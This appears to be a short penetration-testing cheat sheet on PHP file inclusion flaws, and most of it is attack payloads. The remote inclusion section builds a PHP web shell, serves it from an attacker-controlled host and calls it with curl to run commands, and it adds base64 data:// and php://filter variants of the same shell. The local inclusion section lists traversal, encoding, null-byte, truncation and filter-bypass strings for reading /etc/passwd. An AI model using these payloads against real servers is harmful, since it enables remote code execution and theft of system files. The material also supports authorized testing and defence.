File Inclusion

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are web application vulnerabilities where an attacker can manipulate file paths to include files, either from the local system (LFI) or remote servers (RFI), potentially leading to unauthorized access or code execution.

Remote File Inclusion (RFI)

If we find a way to include a remote file, we could try to include php code to execute commands on the host

http://<host>/index.php?page=http://<attacker>/shell.txt

We could serve a malicious PHP code so that the host interprets it.

echo '<?php system($_GET["cmd"]);?>' > shell.txt
python3 -m http.server 80
curl 'http://<host>/index.php?page=http://<attacker>/shell.txt&cmd=<comand>'

If the server were blocking access to external resources, we could attempt to use the data:// wrapper to inject PHP code as base64.

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4K

php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7Pz4K

Local File Inclusion (LFI)

Absolute Path

http://<host>/index.php?page=/etc/passwd

Relative Path Traversal

http://<host>/index.php?page=../../../etc/passwd

Null Byte

http://<host>/index.php?page=../../../etc/passwd%00

Encoding

http://<host>/index.php?page=%252e%252e%252fetc%252fpasswd
http://<host>/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Absolute Path

http://<host>/index.php?page=/etc/passwd

Truncation

http://<host>/index.php?page=../../../etc/passwd......[ADD MORE]
http://<host>/index.php?page=../../../[ADD MORE]../../../etc/passwd

Filtered characters

http://<host>/index.php?page=....//....//....//etc/passwd

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion https://book.hacktricks.xyz/pentesting-web/file-inclusion